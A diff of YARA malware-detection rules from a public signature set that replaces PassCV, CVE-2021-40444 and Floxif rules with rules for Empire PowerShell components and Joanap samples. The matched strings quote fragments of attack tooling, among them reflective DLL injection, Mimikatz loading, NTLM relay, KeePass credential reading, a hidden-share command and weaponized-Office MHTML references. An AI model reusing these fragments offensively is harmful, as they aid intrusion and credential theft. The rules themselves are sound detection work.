+		logic_hash = "ed8aee7ac6c1d93b21cc1aa5c3c18df1566692c63a010715a3aae65e18fffa60"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4"
-		hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78"
-		hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b"
-		hash4 = "0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2"
+		super_rule = 1
+		hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
+		hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
 
 	strings:
-		$x1 = "ncProxyXll" fullword ascii
-		$s1 = "Uniscribe.dll" fullword ascii
-		$s2 = "WS2_32.dll" ascii
-		$s3 = "ProxyDll" fullword ascii
-		$s4 = "JDNSAPI.dll" fullword ascii
-		$s5 = "x64.dat" fullword ascii
-		$s6 = "LSpyb2" fullword ascii
+		$s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
+		$s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
+		$s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and $x1 ) or ( all of them )
+		( uint16( 0 ) == 0x660a and filesize < 100KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_Excalibur_1 : FILE
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen3 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eadad36c-49c8-50e1-8334-813d2e760fe9"
-		date = "2016-10-20"
+		id = "b0f7ed41-be65-5e43-aeb1-56e5e7384e8f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L84-L105"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L449-L467"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ffbd971368420460573c4ecc68261088ffacf91ab9ae72405b41393b04aa2b46"
+		logic_hash = "933fe27c54e90806a21082b4d2e4cbb3491374e48834a64c0d6a520c537d145e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb"
-		hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$x1 = "F:\\Excalibur\\Excalibur\\" ascii
-		$x2 = "Excalibur\\bin\\Shell.pdb" ascii
-		$x3 = "SaberSvc.exe" wide
-		$s1 = "BBB.exe" fullword wide
-		$s2 = "AAA.exe" fullword wide
+		$s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii
+		$s2 = "remote DLL injection" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of ( $x* ) or all of ( $s* ) ) or 3 of them
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_3 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Inveighrelay_Gen : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03e5efc0-6076-501f-a600-b3d9008a8711"
-		date = "2016-10-20"
+		id = "0adebf6f-99e1-5461-8efc-e4660faf6d5d"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L107-L124"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L469-L484"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1032f41688e7cb3fe0be33b143c1af43ee705737a70af3b336ba8504ffe169a9"
+		logic_hash = "183a0afa9233e380471ddfa8f85e6c6555d69c785c9a4e8791e19432b6849558"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1"
+		super_rule = 1
+		hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
 
 	strings:
-		$x1 = "NXKILL" fullword wide
-		$s1 = "2OLE32.DLL" fullword ascii
-		$s2 = "localspn.dll" fullword wide
-		$s3 = "!This is a Win32 program." fullword ascii
+		$s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
+		$s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 8000KB and $x1 and 2 of ( $s* ) )
+		( uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_4 : FILE
+rule SIGNATURE_BASE_Empire_Keepassconfig_Gen : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f182064d-3a91-5a61-aa0f-2ce491a60126"
-		date = "2016-10-20"
+		id = "e2bc88c5-50f8-5ddc-a449-41929b1d0528"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L126-L141"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L486-L500"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c445e745ef520438fa7c4ddcae2657b57c80d798640fdd7c85eabf535f158911"
+		logic_hash = "986f299d2b6e2ec47acae09d8a25b6c45caf83c964208c594433308cd11ad264"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f"
+		super_rule = 1
+		hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
 
 	strings:
-		$s1 = "QWNjZXB0On" fullword ascii
-		$s2 = "VXNlci1BZ2VudDogT" fullword ascii
-		$s3 = "dGFzay5kbnME3luLmN" fullword ascii
+		$s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Tool_Ntscan : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Portscan_Gen : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6ec3371a-2a1c-53d1-b650-d28728db1b40"
-		date = "2016-10-20"
+		id = "c2e01780-02d2-57d1-b38e-5c345ebccad6"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L143-L159"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L502-L517"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f2b41c1e6db8c9288663cccbf5659484ed415b403068cc566b31aa044bf0de9e"
+		logic_hash = "05e786dc42ee5ec56197803577d104595ad6554e028b7633b2f7fdf55a63e27c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665"
+		super_rule = 1
+		hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
 
 	strings:
-		$x1 = "NTscan.EXE" fullword wide
-		$x2 = "NTscan Microsoft " fullword wide
-		$s1 = "admin$" fullword ascii
+		$s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
+		$s2 = "1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+		( uint16( 0 ) == 0x7566 and filesize < 100KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_5 : FILE
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen4 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ce8d1b9e-7750-5796-a048-20bfd48c6aee"
-		date = "2016-10-20"
+		id = "c390638a-0eb1-576d-a08c-203c31d414f3"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L161-L182"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L519-L545"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30508c6561a2bb908945e9092da1d5cf2257b8b183effcea25a1ba15567f3d20"
+		logic_hash = "314574a463f9cc772702d5e3358f5280b2805298fedb89c14786518a4832d63b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5"
+		super_rule = 1
+		hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
+		hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
+		hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
+		hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
 
 	strings:
-		$x1 = "ncircTMPg" fullword ascii
-		$x2 = "~SHELL#" fullword ascii
-		$x3 = "N.adobe.xm" fullword ascii
-		$s1 = "NEL32.DLL" fullword ascii
-		$s2 = "BitLocker.exe" fullword wide
-		$s3 = "|xtplhd" fullword ascii
-		$s4 = "SERVICECORE" fullword wide
-		$s5 = "SHARECONTROL" fullword wide
+		$s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii
+		$s2 = "# Get a handle to the module specified" fullword ascii
+		$s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii
+		$s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) or all of ( $s* ) )
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_EXPL_CVE_2021_40444_Document_Rels_XML : CVE_2021_40444 FILE
+rule SIGNATURE_BASE_Empire_Invoke_Credentialinjection_Invoke_Mimikatz_Gen : FILE
 {
 	meta:
-		description = "Detects indicators found in weaponized documents that exploit CVE-2021-40444"
-		author = "Jeremy Brown / @alteredbytes"
-		id = "812bb68e-71ea-5a9a-8d39-ab99fdaa6c58"
-		date = "2021-09-10"
+		description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d938aadf-6924-5964-9b5a-6bd1b817349f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/AlteredBytes/status/1435811407249952772"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L6-L25"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L547-L563"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b05c3b33c3cab2c9109d808ed197758bc987f07beee77e1f61094715e0c1a1e7"
+		logic_hash = "3210b4407c3209a20d74c8c5af66077cc9b902912ae49253883b7acd87eef1f9"
 		score = 75
-		quality = 85
-		tags = "CVE-2021-40444, FILE"
+		quality = 60
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
 
 	strings:
-		$b1 = "/relationships/oleObject" ascii
-		$b2 = "/relationships/attachedTemplate" ascii
-		$c1 = "Target=\"mhtml:http" nocase
-		$c2 = "!x-usc:http" nocase
-		$c3 = "TargetMode=\"External\"" nocase
+		$s1 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle" fullword ascii
+		$s2 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x6D783F3C and filesize < 10KB and 1 of ( $b* ) and all of ( $c* )
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_EXPL_MAL_Maldoc_OBFUSCT_MHTML_Sep21_1 : CVE_2021_40444 FILE
+rule SIGNATURE_BASE_Empire_Invoke_Gen : FILE
 {
 	meta:
-		description = "Detects suspicious office reference files including an obfuscated MHTML reference exploiting CVE-2021-40444"
+		description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "781cfd61-d5ac-58e5-868f-dbd2a2df3500"
-		date = "2021-09-18"
+		id = "913f971d-e4e3-55e9-904b-82b25a4e6f0f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/decalage2/status/1438946225190014984?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L27-L41"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L565-L582"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
-		logic_hash = "11a73572970d2d85d308330119a2c5243f2848ae78a861decdb0cdbde0d9d1c2"
-		score = 90
+		logic_hash = "11d00ea1f40d34cfd3417db337a01eca39b0e77049f74f0c591cd1d388a8d194"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-40444, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$s1 = "109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#109;&#108" ascii wide
+		$s1 = "$Shellcode1 += 0x48" fullword ascii
+		$s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii
 
 	condition:
-		filesize < 25KB and all of them
+		( uint16( 0 ) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_EXPL_XML_Encoded_CVE_2021_40444 : CVE_2021_40444 FILE
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen5 : FILE
 {
 	meta:
-		description = "Detects possible CVE-2021-40444 with no encoding, HTML/XML entity (and hex notation) encoding, or all 3"
-		author = "James E.C, Proofpoint"
-		id = "4bf9ec64-c662-5c8f-9e58-12a7412ef07d"
-		date = "2021-09-18"
-		modified = "2021-09-19"
-		reference = "https://twitter.com/sudosev/status/1439205606129377282"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L44-L61"
+		description = "Detects Empire component"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4c23592e-5788-5b84-995a-028142cbc52f"
+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L584-L601"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
-		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
-		logic_hash = "feaeadd8e7e262f191ea0c2f85377531208262e5ac19d6706703e62cf8b4ec90"
-		score = 70
-		quality = 60
-		tags = "CVE-2021-40444, FILE"
+		logic_hash = "115fffabb09ed00ab46c6f980c3a7727070a303cafa900cc1ce04e3999b6b70e"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$t_xml_r = /Target[\s]{0,20}=[\s]{0,20}\["']([Mm]|&#(109|77|x6d|x4d);)([Hh]|&#(104|72|x68|x48);)([Tt]|&#(116|84|x74|x54);)([Mm]|&#(109|77|x6d|x4d);)([Ll]|&#(108|76|x6c|x4c);)(:|&#58;|&#x3a)/
-		$t_mode_r = /TargetMode[\s]{0,20}=[\s]{0,20}\["']([Ee]|&#(x45|x65|69|101);)([Xx]|&#(x58|x78|88|120);)([Tt]|&#(x74|x54|84|116);)/
+		$s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
+		$s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii
 
 	condition:
-		filesize < 500KB and $h1 and all of ( $t_* )
+		( uint16( 0 ) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_1 : WINDOWS CVE FILE
+
+rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample1 : FILE
 {
 	meta:
-		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
+		description = "Detects malware from TA18-149A report by US-CERT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ffcaf270-f574-5692-90e5-6776c34eb71b"
-		date = "2021-09-18"
+		id = "a3a4f9a6-367d-5d99-bffb-f4ff03fa4a09"
+		date = "2018-05-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/sudosev/status/1439205606129377282"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L64-L81"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_149A.yar#L13-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
-		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
-		logic_hash = "fc8f0dd02460ab8f8cc6717c66eba51e6ed74881a48e92fd0bf978467dfb40e3"
-		score = 65
+		logic_hash = "746c74713ac52f62d5a5c41d2c9321e00481a45aa2c23f1695fab0f5b6d5dfb4"
+		score = 75
 		quality = 85
-		tags = "WINDOWS, CVE, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ea46ed5aed900cd9f01156a1cd446cbb3e10191f9f980e9f710ea1c20440c781"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$xml_e = "Target=\"&#" ascii wide
-		$xml_mode_1 = "TargetMode=\"&#" ascii wide
+		$x1 = "cmd.exe /q /c net share adnim$" ascii
+		$x2 = "\\\\%s\\adnim$\\system32\\%s" fullword ascii
+		$s1 = "SMB_Dll.dll" fullword ascii
+		$s2 = "%s User or Password is not correct!" fullword ascii
+		$s3 = "perfw06.dat" fullword ascii
 
 	condition:
-		filesize < 500KB and $h1 and 1 of ( $xml* )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "f0087d7b90876a2769f2229c6789fcf3" or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_2 : WINDOWS CVE FILE
+
+rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample2 : FILE
 {
 	meta:
-		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
+		description = "Detects malware from TA18-149A report by US-CERT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3c5ec4f-5d2a-523c-bd4b-b75c04bac87d"
-		date = "2021-09-18"
+		id = "9f4e6e6c-ee2b-5fa3-bf85-5a1652b38c52"
+		date = "2018-05-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/sudosev/status/1439205606129377282"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L83-L98"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_149A.yar#L36-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "82c70e0f0b72a57302e5853cc53ae18dbb0bc8dabdfd27b473a7664b2fc5e874"
-		score = 65
+		logic_hash = "046135e4a1161841835cd9d10e13224b440e914ce3f409bad84a1df2638a7d5f"
+		score = 75
 		quality = 85
-		tags = "WINDOWS, CVE, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "077d9e0e12357d27f7f0c336239e961a7049971446f7a3f10268d9439ef67885"
 
 	strings:
-		$h1 = "<?xml " ascii wide
-		$a1 = "Target" ascii wide
-		$a2 = "TargetMode" ascii wide
-		$xml_e = "&#x0000" ascii wide
+		$s1 = "%SystemRoot%\\system32\\svchost.exe -k Wmmvsvc" fullword ascii
+		$s2 = "%SystemRoot%\\system32\\svchost.exe -k SCardPrv" fullword ascii
+		$s3 = "%SystemRoot%\\system32\\Wmmvsvc.dll" fullword ascii
+		$s4 = "%SystemRoot%\\system32\\scardprv.dll" fullword ascii
 
 	condition:
-		filesize < 500KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "e8cd12071a8e823ebc434c8ee3e23203" or 2 of them )
 }
-rule SIGNATURE_BASE_Malware_Floxif_Mpsvc_Dll : HIGHVOL FILE
+
+rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample3 : FILE
 {
 	meta:
-		description = "Malware - Floxif"
+		description = "Detects malware from TA18-149A report by US-CERT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37af366a-24b2-5402-b0b5-6e2c80f8c903"
-		date = "2017-04-07"
+		id = "1c2551bc-01dd-5b30-a4cc-703a868cde73"
+		date = "2018-05-30"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_floxif.yar#L2-L17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_149A.yar#L57-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e51258558dfd9a2c65589100a224492f4582067484c99d405b2d432a48cc6ed8"
+		logic_hash = "a3da6c70d2ab94820324a55f1bcdcf5507a8ddf26efc80904daf0d9b27ac9312"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1e654ee1c4736f4ccb8b5b7aa604782cfb584068df4d9e006de8009e60ab5a14"
+		hash1 = "a1c483b0ee740291b91b11e18dd05f0a460127acfc19d47b446d11cd0e26d717"
 
 	strings:
-		$op1 = { 04 80 7a 03 01 75 04 8d 42 04 c3 8d 42 04 53 8b }
-		$op2 = { 88 19 74 03 41 eb ea c6 42 03 01 5b c3 8b 4c 24 }
-		$op3 = { ff 03 8d 00 f9 ff ff 88 01 eb a1 }
+		$s1 = "mssvcdll.dll" fullword ascii
+		$s2 = "https://www.google.com/index.html" fullword ascii
+		$s3 = "LOGINDLG" fullword wide
+		$s4 = "rundll" fullword ascii
+		$s5 = "%%s\\%%s%%0%dd.%%s" fullword ascii
+		$s6 = "%%s\\%%s%%0%dd" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
